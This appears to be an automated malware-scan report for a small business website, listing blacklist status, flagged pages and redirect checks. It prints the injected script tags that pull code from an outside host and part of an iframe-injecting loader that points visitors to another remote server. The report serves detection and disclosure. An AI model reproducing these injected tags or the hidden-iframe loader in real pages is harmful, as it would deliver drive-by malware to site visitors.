Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=skiphirebristol.org.uk
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://skiphirebristol.org.uk/ | 200 OK Content-Length: 4742 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://pc-pointers.com/37qlnrdz.php?id=9167756"></script> | ||
http://skiphirebristol.org.uk/index.html | 200 OK Content-Length: 4742 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://pc-pointers.com/37qlnrdz.php?id=9167756"></script> | ||
http://skiphirebristol.org.uk/about.html | 200 OK Content-Length: 3164 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://pc-pointers.com/37qlnrdz.php?id=9167742"></script> | ||
http://skiphirebristol.org.uk/services.html | 200 OK Content-Length: 3469 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://pc-pointers.com/37qlnrdz.php?id=9167760"></script> | ||
http://skiphirebristol.org.uk/contactform.php | 200 OK Content-Length: 3128 Content-Type: text/html | clean |
http://skiphirebristol.org.uk/scripts/gen_validatorv31.js | 200 OK Content-Length: 21538 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function jquqj09() { var static='ajax'; var controller='index.php'; var jquqj = document.createElement('iframe'); jquqj.src = 'http://mediabruno.it/expsrv.php'; jquqj.style.position = 'absolute'; jquqj.style.color = '31446'; jquqj.style.height = '31446px'; jquqj.style.width = '31446px'; jquqj.style.left = '100031446'; jquqj.style.top = '100031446'; if (!document.getElementById('jquqj')) { document.write('<p id=\'jquqj\' class=\'jquqj09\' ></p>'); document.getElementById('jquqj').appe Antivirus reports:
| ||
http://skiphirebristol.org.uk/test404page.js | 200 OK Content-Length: 627 Content-Type: text/html | clean |
http://skiphirebristol.org.uk/privacy.html | 200 OK Content-Length: 4055 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://pc-pointers.com/37qlnrdz.php?id=9167758"></script> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: skiphirebristol.org.uk
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Jan 2015 08:40:30 GMT
Accept-Ranges: bytes
ETag: "1286-544dae82-69533d384415be34"
Server: LiteSpeed
Content-Length: 4742
Content-Type: text/html
Last-Modified: Mon, 27 Oct 2014 02:31:30 GMT
...4742 bytes of data.
GET / HTTP/1.1
Host: skiphirebristol.org.uk
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Jan 2015 08:40:30 GMT
Accept-Ranges: bytes
ETag: "1286-544dae82-69533d384415be34"
Server: LiteSpeed
Content-Length: 4742
Content-Type: text/html
Last-Modified: Mon, 27 Oct 2014 02:31:30 GMT
...4742 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: skiphirebristol.org.uk
Referer: http://www.google.com/search?q=skiphirebristol.org.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: skiphirebristol.org.uk
Referer: http://www.google.com/search?q=skiphirebristol.org.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.